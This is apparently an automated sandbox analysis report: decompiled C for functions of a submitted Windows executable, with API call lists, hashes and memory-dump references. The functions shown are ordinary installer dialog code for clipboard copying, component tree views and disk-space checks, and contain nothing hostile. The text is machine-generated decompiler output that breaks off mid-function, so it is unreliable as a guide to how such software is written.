Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 31f78a86cd46fd7a0018bd77bfa4d4c204eb943dc09def5fdfba012cb08fa724
Instruction ID: dd629d7ffa80b2531d7668e5a1a305395e4adc4893f6b58610a8e469f8d50dee
Opcode Fuzzy Hash: 31f78a86cd46fd7a0018bd77bfa4d4c204eb943dc09def5fdfba012cb08fa724
Instruction Fuzzy Hash: F8C01230504600E6D2246F759E0A6093A18574173AB904336B179B50F1C77C5901453E

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00404EE8 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 278
windowclipboardmemoryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00404EE8(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t87;
				unsigned int _t92;
				int _t94;
				int _t95;
				void* _t101;
				intOrPtr _t123;
				struct HWND__* _t127;
				int _t149;
				int _t150;
				struct HWND__* _t154;
				struct HWND__* _t158;
				struct HMENU__* _t160;
				long _t162;
				void* _t163;
				short* _t164;

				_t154 =  *0x42e344;
				_t149 = 0;
				_v8 = _t154;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00404E7C, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					if(_a8 != 0x111) {
						L17:
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b || _a12 != _t154) {
								goto L20;
							} else {
								_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
								_a8 = _t87;
								if(_t87 <= _t149) {
									L37:
									return 0;
								}
								_t160 = CreatePopupMenu();
								AppendMenuA(_t160, _t149, 1, E00405A2E(_t149, _t154, _t160, _t149, 0xffffffe1));
								_t92 = _a16;
								if(_t92 != 0xffffffff) {
									_t150 = _t92;
									_t94 = _t92 >> 0x10;
								} else {
									GetWindowRect(_t154,  &_v28);
									_t150 = _v28.left;
									_t94 = _v28.top;
								}
								_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
								_t162 = 1;
								if(_t95 == 1) {
									_v60 = _t149;
									_v48 = 0x429fe0;
									_v44 = 0xfff;
									_a4 = _a8;
									do {
										_a4 = _a4 - 1;
										_t162 = _t162 + SendMessageA(_v8, 0x102d, _a4,  &_v68) + 2;
									} while (_a4 != _t149);
									OpenClipboard(_t149);
									EmptyClipboard();
									_t101 = GlobalAlloc(0x42, _t162);
									_a4 = _t101;
									_t163 = GlobalLock(_t101);
									do {
										_v48 = _t163;
										_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
										 *_t164 = 0xa0d;
										_t163 = _t164 + 2;
										_t149 = _t149 + 1;
									} while (_t149 < _a8);
									GlobalUnlock(_a4);
									SetClipboardData(1, _a4);
									CloseClipboard();
								}
								goto L37;
							}
						}
						if( *0x42e32c == _t149) {
							ShowWindow( *0x42eb68, 8);
							if( *0x42ebec == _t149) {
								E00404DAA( *((intOrPtr*)( *0x4297b0 + 0x34)), _t149);
							}
							E00403D97(1);
							goto L25;
						}
						 *0x4293a8 = 2;
						E00403D97(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E00403E25(_a8, _a12, _a16);
						}
						ShowWindow( *0x42e330, _t149);
						ShowWindow(_t154, 8);
						E00403DF3(_t154);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_v60 = 2;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t123 =  *0x42eb70;
				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
				_a12 =  *((intOrPtr*)(_t123 + 0x60));
				 *0x42e330 = GetDlgItem(_a4, 0x403);
				 *0x42e328 = GetDlgItem(_a4, 0x3ee);
				_t127 = GetDlgItem(_a4, 0x3f8);
				 *0x42e344 = _t127;
				_v8 = _t127;
				E00403DF3( *0x42e330);
				 *0x42e334 = E0040464C(4);
				 *0x42e34c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v60);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t149) {
					SendMessageA(_v8, 0x1024, _t149, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403DBE(_a4);
				if(( *0x42eb78 & 0x00000003) != 0) {
					ShowWindow( *0x42e330, _t149);
					if(( *0x42eb78 & 0x00000002) != 0) {
						 *0x42e330 = _t149;
					} else {
						ShowWindow(_v8, 8);
					}
					E00403DF3( *0x42e328);
				}
				_t158 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t158, 0x401, _t149, 0x75300000);
				if(( *0x42eb78 & 0x00000004) != 0) {
					SendMessageA(_t158, 0x409, _t149, _a12);
					SendMessageA(_t158, 0x2001, _t149, _a8);
				}
				goto L37;
			}

0x00404ef1
0x00404ef7
0x00404f00
0x00404f03
0x0040509b
0x004050bf
0x004050bf
0x004050d2
0x004050f0
0x004050f7
0x0040514e
0x00405152
0x00000000
0x00405159
0x00405161
0x00405169
0x0040516c
0x00405265
0x00000000
0x00405265
0x0040517b
0x00405187
0x0040518d
0x00405193
0x004051a8
0x004051ae
0x00405195
0x0040519a
0x004051a0
0x004051a3
0x004051a3
0x004051be
0x004051c6
0x004051c9
0x004051d2
0x004051d5
0x004051dc
0x004051e3
0x004051eb
0x004051eb
0x00405202
0x00405202
0x00405209
0x0040520f
0x00405218
0x0040521f
0x00405228
0x0040522a
0x0040522d
0x0040523c
0x0040523e
0x00405244
0x00405245
0x00405246
0x0040524e
0x00405259
0x0040525f
0x0040525f
0x00000000
0x004051c9
0x00405152
0x004050ff
0x0040512f
0x00405137
0x00405142
0x00405142
0x00405149
0x00000000
0x00405149
0x00405103
0x0040510d
0x00000000
0x004050d4
0x004050da
0x00405112
0x00000000
0x0040511b
0x004050e3
0x004050e8
0x004050eb
0x00000000
0x004050eb
0x004050d2
0x00404f09
0x00404f0d
0x00404f16
0x00404f1d
0x00404f20
0x00404f23
0x00404f26
0x00404f27
0x00404f28
0x00404f41
0x00404f44
0x00404f4e
0x00404f5d
0x00404f65
0x00404f6d
0x00404f72
0x00404f75
0x00404f81
0x00404f8a
0x00404f93
0x00404fb6
0x00404fbc
0x00404fcd
0x00404fd2
0x00404fe0
0x00404fee
0x00404fee
0x00404ff3
0x00405001
0x00405001
0x00405006
0x00405009
0x0040500e
0x0040501a
0x00405023
0x00405030
0x0040503f
0x00405032
0x00405037
0x00405037
0x0040504b
0x0040504b
0x0040505f
0x00405068
0x00405071
0x00405081
0x0040508d
0x0040508d
0x00000000

APIs

GetDlgItem.USER32 ref: 00404F47
GetDlgItem.USER32 ref: 00404F56
GetClientRect.USER32 ref: 00404F93
GetSystemMetrics.USER32 ref: 00404F9B
SendMessageA.USER32 ref: 00404FBC
SendMessageA.USER32 ref: 00404FCD
SendMessageA.USER32 ref: 00404FE0
SendMessageA.USER32 ref: 00404FEE
SendMessageA.USER32 ref: 00405001
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405023
ShowWindow.USER32(?,00000008), ref: 00405037
GetDlgItem.USER32 ref: 00405058
SendMessageA.USER32 ref: 00405068
SendMessageA.USER32 ref: 00405081
SendMessageA.USER32 ref: 0040508D
GetDlgItem.USER32 ref: 00404F65

Part of subcall function 00403DF3: SendMessageA.USER32 ref: 00403E01

GetDlgItem.USER32 ref: 004050AA
CreateThread.KERNEL32 ref: 004050B8
CloseHandle.KERNEL32(00000000), ref: 004050BF
ShowWindow.USER32(00000000), ref: 004050E3
ShowWindow.USER32(?,00000008), ref: 004050E8
ShowWindow.USER32(00000008), ref: 0040512F
SendMessageA.USER32 ref: 00405161
CreatePopupMenu.USER32 ref: 00405172
AppendMenuA.USER32 ref: 00405187
GetWindowRect.USER32 ref: 0040519A
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004051BE
SendMessageA.USER32 ref: 004051F9
OpenClipboard.USER32(00000000), ref: 00405209
EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 0040520F
GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405218
GlobalLock.KERNEL32 ref: 00405222
SendMessageA.USER32 ref: 00405236
GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 0040524E
SetClipboardData.USER32 ref: 00405259
CloseClipboard.USER32(?,?,00000000,?,00000000), ref: 0040525F

Strings

{, xrefs: 0040514E

Memory Dump Source

Source File: 00000000.00000002.376208479.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.376119832.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376324958.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376799904.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: 502b3e781240547b4f79c84f5df072659d73b9fdff3a6a82af1c7000a0e1b831
Instruction ID: ecf959edf644124ae9a18d4fa2a520563b4821934e06b5e1f2851b0e4fc8d151
Opcode Fuzzy Hash: 502b3e781240547b4f79c84f5df072659d73b9fdff3a6a82af1c7000a0e1b831
Instruction Fuzzy Hash: FBA14870900208BFEB219FA1DD89AAE7F79FB08355F40407AFA05AA2A0C7755E41DF59

Uniqueness

Uniqueness Score: -1.00%

Function 004046F9 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 478
windowmemoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E004046F9(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _v24;
				long _v28;
				int _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				intOrPtr _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t182;
				int _t196;
				long _t202;
				signed int _t206;
				signed int _t217;
				void* _t220;
				void* _t221;
				int _t227;
				signed int _t232;
				signed int _t233;
				signed int _t240;
				struct HBITMAP__* _t250;
				void* _t252;
				char* _t268;
				signed char _t269;
				long _t274;
				int _t280;
				signed int* _t281;
				int _t282;
				long _t283;
				int _t285;
				long _t286;
				signed int _t287;
				long _t288;
				signed int _t291;
				signed int _t298;
				signed int _t300;
				signed int _t302;
				int* _t310;
				void* _t311;
				int _t315;
				int _t316;
				int _t317;
				signed int _t318;
				void* _t320;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t182 = GetDlgItem(_a4, 0x408);
				_t280 =  *0x42eb88;
				_t320 = SendMessageA;
				_v8 = _t182;
				_t315 = 0;
				_v32 = _t280;
				_v20 =  *0x42eb70 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t289 = _a16;
					} else {
						_a12 = _t315;
						_t289 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t289;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t289 + 4)) == 0x408) {
							if(( *0x42eb79 & 0x00000002) != 0) {
								L41:
								if(_v16 != _t315) {
									_t232 = _v16;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
									}
									_t233 = _v16;
									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) & 0xffffffdf;
										} else {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t289 = 0 | _a8 != 0x00000413;
								_t240 = E00404679(_v8, _a8 != 0x413);
								if(_t240 >= _t315) {
									_t93 = _t280 + 8; // 0x8
									_t310 = _t240 * 0x418 + _t93;
									_t289 =  *_t310;
									if((_t289 & 0x00000010) == 0) {
										if((_t289 & 0x00000040) == 0) {
											_t298 = _t289 ^ 0x00000001;
										} else {
											_t300 = _t289 ^ 0x00000080;
											if(_t300 >= 0) {
												_t298 = _t300 & 0xfffffffe;
											} else {
												_t298 = _t300 | 0x00000001;
											}
										}
										 *_t310 = _t298;
										E0040117D(_t240);
										_t289 = 1;
										_a8 = 0x40f;
										_a12 = 1;
										_a16 =  !( *0x42eb78) >> 0x00000008 & 1;
									}
								}
								goto L41;
							}
							_t289 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, _t315, _t315);
							}
							if(_a8 == 0x40b) {
								_t220 =  *0x429fbc;
								if(_t220 != _t315) {
									ImageList_Destroy(_t220);
								}
								_t221 =  *0x429fd4;
								if(_t221 != _t315) {
									GlobalFree(_t221);
								}
								 *0x429fbc = _t315;
								 *0x429fd4 = _t315;
								 *0x42ebc0 = _t315;
							}
							if(_a8 != 0x40f) {
								L86:
								if(_a8 == 0x420 && ( *0x42eb79 & 0x00000001) != 0) {
									_t316 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t316);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
								}
								goto L89;
							} else {
								E004011EF(_t289, _t315, _t315);
								if(_a12 != _t315) {
									E0040140B(8);
								}
								if(_a16 == _t315) {
									L73:
									E004011EF(_t289, _t315, _t315);
									_v32 =  *0x429fd4;
									_t196 =  *0x42eb88;
									_v60 = 0xf030;
									_v16 = _t315;
									if( *0x42eb8c <= _t315) {
										L84:
										InvalidateRect(_v8, _t315, 1);
										if( *((intOrPtr*)( *0x42e33c + 0x10)) != _t315) {
											E00404597(0x3ff, 0xfffffffb, E0040464C(5));
										}
										goto L86;
									}
									_t281 = _t196 + 8;
									do {
										_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
										if(_t202 != _t315) {
											_t291 =  *_t281;
											_v68 = _t202;
											_v72 = 8;
											if((_t291 & 0x00000001) != 0) {
												_v72 = 9;
												_v56 =  &(_t281[4]);
												_t281[0] = _t281[0] & 0x000000fe;
											}
											if((_t291 & 0x00000040) == 0) {
												_t206 = (_t291 & 0x00000001) + 1;
												if((_t291 & 0x00000010) != 0) {
													_t206 = _t206 + 3;
												}
											} else {
												_t206 = 3;
											}
											_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t291 >> 0x00000005 & 0x00000001) + 1, _v68);
											SendMessageA(_v8, 0x110d, _t315,  &_v72);
										}
										_v16 = _v16 + 1;
										_t281 =  &(_t281[0x106]);
									} while (_v16 <  *0x42eb8c);
									goto L84;
								} else {
									_t282 = E004012E2( *0x429fd4);
									E00401299(_t282);
									_t217 = 0;
									_t289 = 0;
									if(_t282 <= _t315) {
										L72:
										SendMessageA(_v12, 0x14e, _t289, _t315);
										_a16 = _t282;
										_a8 = 0x420;
										goto L73;
									} else {
										goto L69;
									}
									do {
										L69:
										if( *((intOrPtr*)(_v20 + _t217 * 4)) != _t315) {
											_t289 = _t289 + 1;
										}
										_t217 = _t217 + 1;
									} while (_t217 < _t282);
									goto L72;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L89;
						} else {
							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
							if(_t227 == 0xffffffff) {
								goto L89;
							}
							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
							if(_t283 == 0xffffffff ||  *((intOrPtr*)(_v20 + _t283 * 4)) == _t315) {
								_t283 = 0x20;
							}
							E00401299(_t283);
							SendMessageA(_a4, 0x420, _t315, _t283);
							_a12 = 1;
							_a16 = _t315;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					 *0x42ebc0 = _a4;
					_t285 = 2;
					_v28 = 0;
					_v16 = _t285;
					 *0x429fd4 = GlobalAlloc(0x40,  *0x42eb8c << 2);
					_t250 = LoadBitmapA( *0x42eb60, 0x6e);
					 *0x429fc8 =  *0x429fc8 | 0xffffffff;
					_v24 = _t250;
					 *0x429fd0 = SetWindowLongA(_v8, 0xfffffffc, E00404CFA);
					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x429fbc = _t252;
					ImageList_AddMasked(_t252, _v24, 0xff00ff);
					SendMessageA(_v8, 0x1109, _t285,  *0x429fbc);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v24);
					_t286 = 0;
					do {
						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
							if(_t286 != 0x20) {
								_v16 = _t315;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405A2E(_t286, _t315, _t320, _t315, _t258)), _t286);
						}
						_t286 = _t286 + 1;
					} while (_t286 < 0x21);
					_t317 = _a16;
					_t287 = _v16;
					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
					_push(0x15);
					E00403DBE(_a4);
					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
					_push(0x16);
					E00403DBE(_a4);
					_t318 = 0;
					_t288 = 0;
					if( *0x42eb8c <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t311 = _v32 + 8;
						_v24 = _t311;
						do {
							_t268 = _t311 + 0x10;
							if( *_t268 != 0) {
								_v60 = _t268;
								_t269 =  *_t311;
								_t302 = 0x20;
								_v84 = _t288;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t302;
								_v40 = _t318;
								_v68 = _t269 & _t302;
								if((_t269 & 0x00000002) == 0) {
									if((_t269 & 0x00000004) == 0) {
										 *( *0x429fd4 + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v28 = 1;
									 *( *0x429fd4 + _t318 * 4) = _t274;
									_t288 =  *( *0x429fd4 + _t318 * 4);
								}
							}
							_t318 = _t318 + 1;
							_t311 = _v24 + 0x418;
							_v24 = _t311;
						} while (_t318 <  *0x42eb8c);
						if(_v28 != 0) {
							L20:
							if(_v16 != 0) {
								E00403DF3(_v8);
								_t280 = _v32;
								_t315 = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403DF3(_v12);
								L89:
								return E00403E25(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}

0x00404717
0x0040471d
0x0040471f
0x00404725
0x0040472b
0x00404738
0x00404741
0x00404744
0x00404747
0x0040496f
0x00404976
0x0040498a
0x00404978
0x0040497a
0x0040497d
0x0040497e
0x00404985
0x00404985
0x00404996
0x004049a4
0x004049a7
0x004049bd
0x00404a35
0x00404a38
0x00404a3a
0x00404a44
0x00404a52
0x00404a52
0x00404a54
0x00404a5e
0x00404a64
0x00404a85
0x00404a66
0x00404a73
0x00404a73
0x00404a64
0x00404a5e
0x00000000
0x00404a38
0x004049c2
0x004049cd
0x004049d2
0x004049d9
0x004049e0
0x004049ea
0x004049ea
0x004049ee
0x004049f3
0x004049f8
0x00404a0e
0x004049fa
0x004049fa
0x00404a02
0x00404a09
0x00404a04
0x00404a04
0x00404a04
0x00404a02
0x00404a12
0x00404a14
0x00404a22
0x00404a23
0x00404a2f
0x00404a32
0x00404a32
0x004049f3
0x00000000
0x004049e0
0x004049c4
0x004049cb
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00404a88
0x00404a88
0x00404a8f
0x00404b03
0x00404b0a
0x00404b16
0x00404b16
0x00404b1f
0x00404b21
0x00404b28
0x00404b2b
0x00404b2b
0x00404b31
0x00404b38
0x00404b3b
0x00404b3b
0x00404b41
0x00404b47
0x00404b4d
0x00404b4d
0x00404b5a
0x00404ca7
0x00404cae
0x00404ccb
0x00404cd1
0x00404ce3
0x00404ce3
0x00000000
0x00404b60
0x00404b62
0x00404b6a
0x00404b6e
0x00404b6e
0x00404b76
0x00404bb7
0x00404bb9
0x00404bc9
0x00404bcc
0x00404bd1
0x00404bd8
0x00404bdb
0x00404c7d
0x00404c83
0x00404c91
0x00404ca2
0x00404ca2
0x00000000
0x00404c91
0x00404be1
0x00404be4
0x00404bea
0x00404bef
0x00404bf1
0x00404bf3
0x00404bf9
0x00404c00
0x00404c05
0x00404c0c
0x00404c0f
0x00404c0f
0x00404c16
0x00404c22
0x00404c26
0x00404c28
0x00404c28
0x00404c18
0x00404c1a
0x00404c1a
0x00404c48
0x00404c54
0x00404c63
0x00404c63
0x00404c65
0x00404c68
0x00404c71
0x00000000
0x00404b78
0x00404b83
0x00404b86
0x00404b8b
0x00404b8d
0x00404b91
0x00404ba1
0x00404bab
0x00404bad
0x00404bb0
0x00000000
0x00000000
0x00000000
0x00000000
0x00404b93
0x00404b93
0x00404b99
0x00404b9b
0x00404b9b
0x00404b9c
0x00404b9d
0x00000000
0x00404b93
0x00404b76
0x00404b5a
0x00404a97
0x00000000
0x00404aad
0x00404ab7
0x00404abc
0x00000000
0x00000000
0x00404ace
0x00404ad3
0x00404adf
0x00404adf
0x00404ae1
0x00404af0
0x00404af2
0x00404af9
0x00404afc
0x00000000
0x00404afc
0x00404a97
0x0040474d
0x00404752
0x0040475c
0x0040475d
0x00404766
0x00404771
0x0040477c
0x00404782
0x00404790
0x004047a5
0x004047aa
0x004047b5
0x004047be
0x004047d3
0x004047e4
0x004047f1
0x004047f1
0x004047f6
0x004047fc
0x004047fe
0x00404801
0x00404806
0x0040480b
0x0040480d
0x0040480d
0x0040482d
0x0040482d
0x0040482f
0x00404830
0x00404835
0x00404838
0x0040483b
0x0040483f
0x00404844
0x00404849
0x0040484d
0x00404852
0x00404857
0x00404859
0x00404861
0x0040492b
0x0040493e
0x00000000
0x00404867
0x0040486a
0x0040486d
0x00404870
0x00404870
0x00404876
0x0040487c
0x0040487f
0x00404885
0x00404886
0x0040488b
0x00404894
0x0040489b
0x0040489e
0x004048a1
0x004048a4
0x004048e0
0x00404909
0x004048e2
0x004048ef
0x004048ef
0x004048a6
0x004048a9
0x004048b8
0x004048c2
0x004048ca
0x004048d1
0x004048d9
0x004048d9
0x004048a4
0x0040490f
0x00404910
0x0040491c
0x0040491c
0x00404929
0x00404944
0x00404948
0x00404965
0x0040496a
0x0040496d
0x00000000
0x0040494a
0x0040494f
0x00404958
0x00404ce5
0x00404cf7
0x00404cf7
0x00404948
0x00000000
0x00404929
0x00404861

APIs

GetDlgItem.USER32 ref: 00404710
GetDlgItem.USER32 ref: 0040471D
GlobalAlloc.KERNEL32(00000040,?), ref: 00404769
LoadBitmapA.USER32 ref: 0040477C
SetWindowLongA.USER32 ref: 00404796
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004047AA
ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 004047BE
SendMessageA.USER32 ref: 004047D3
SendMessageA.USER32 ref: 004047DF
SendMessageA.USER32 ref: 004047F1
DeleteObject.GDI32(?), ref: 004047F6
SendMessageA.USER32 ref: 00404821
SendMessageA.USER32 ref: 0040482D
SendMessageA.USER32 ref: 004048C2
SendMessageA.USER32 ref: 004048ED
SendMessageA.USER32 ref: 00404901
GetWindowLongA.USER32 ref: 00404930
SetWindowLongA.USER32 ref: 0040493E
ShowWindow.USER32(?,00000005), ref: 0040494F
SendMessageA.USER32 ref: 00404A52
SendMessageA.USER32 ref: 00404AB7
SendMessageA.USER32 ref: 00404ACC
SendMessageA.USER32 ref: 00404AF0
SendMessageA.USER32 ref: 00404B16
ImageList_Destroy.COMCTL32(?), ref: 00404B2B
GlobalFree.KERNEL32 ref: 00404B3B
SendMessageA.USER32 ref: 00404BAB
SendMessageA.USER32 ref: 00404C54
SendMessageA.USER32 ref: 00404C63
InvalidateRect.USER32(?,00000000,00000001), ref: 00404C83
ShowWindow.USER32(?,00000000), ref: 00404CD1
GetDlgItem.USER32 ref: 00404CDC
ShowWindow.USER32(00000000), ref: 00404CE3

Strings

M, xrefs: 004048A9
N, xrefs: 0040498D
, xrefs: 00404CBB

Memory Dump Source

Source File: 00000000.00000002.376208479.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.376119832.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376324958.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376799904.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 9006264d80cea567de8ea85ae76f5f4e6db86d56f38ece968a838e3dcd762fad
Instruction ID: 30a51c26aaa2b30bd696497e7e47c5adc9155ce2862f65cc436e234c57937e2f
Opcode Fuzzy Hash: 9006264d80cea567de8ea85ae76f5f4e6db86d56f38ece968a838e3dcd762fad
Instruction Fuzzy Hash: D402AFB0A00208AFDB20DF55DD45AAE7BB5FB84314F10817AF611BA2E1D7799E42CF58

Uniqueness

Uniqueness Score: -1.00%

Function 004041FC Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 266
stringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E004041FC(struct HWND__* _a4, signed int _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				struct HWND__* _v12;
				long _v16;
				long _v20;
				char _v24;
				long _v28;
				char _v32;
				intOrPtr _v36;
				long _v40;
				signed int _v44;
				CHAR* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				CHAR* _v68;
				void _v72;
				char _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t81;
				long _t86;
				signed char* _t88;
				void* _t94;
				signed int _t95;
				signed short _t113;
				signed int _t117;
				char* _t122;
				intOrPtr* _t138;
				signed int* _t145;
				signed int _t148;
				signed int _t153;
				struct HWND__* _t159;
				CHAR* _t162;
				int _t163;

				_t81 =  *0x4297b0;
				_v36 = _t81;
				_t162 = ( *(_t81 + 0x3c) << 0xa) + 0x42f000;
				_v8 =  *((intOrPtr*)(_t81 + 0x38));
				if(_a8 == 0x40b) {
					E004052B1(0x3fb, _t162);
					E00405C6E(_t162);
				}
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E004052B1(0x3fb, _t162);
							if(E004055E0(_t180, _t162) == 0) {
								_v8 = 1;
							}
							E00405A0C(0x428fa8, _t162);
							_t145 = 0;
							_t86 = E00405D2E(0);
							_v16 = _t86;
							if(_t86 == 0) {
								L31:
								E00405A0C(0x428fa8, _t162);
								_t88 = E00405593(0x428fa8);
								if(_t88 != _t145) {
									 *_t88 =  *_t88 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x428fa8,  &_v20,  &_v28,  &_v16,  &_v40) == 0) {
									_t153 = _a8;
									goto L37;
								} else {
									_t163 = 0x400;
									_t153 = MulDiv(_v20 * _v28, _v16, 0x400);
									_v12 = 1;
									goto L38;
								}
							} else {
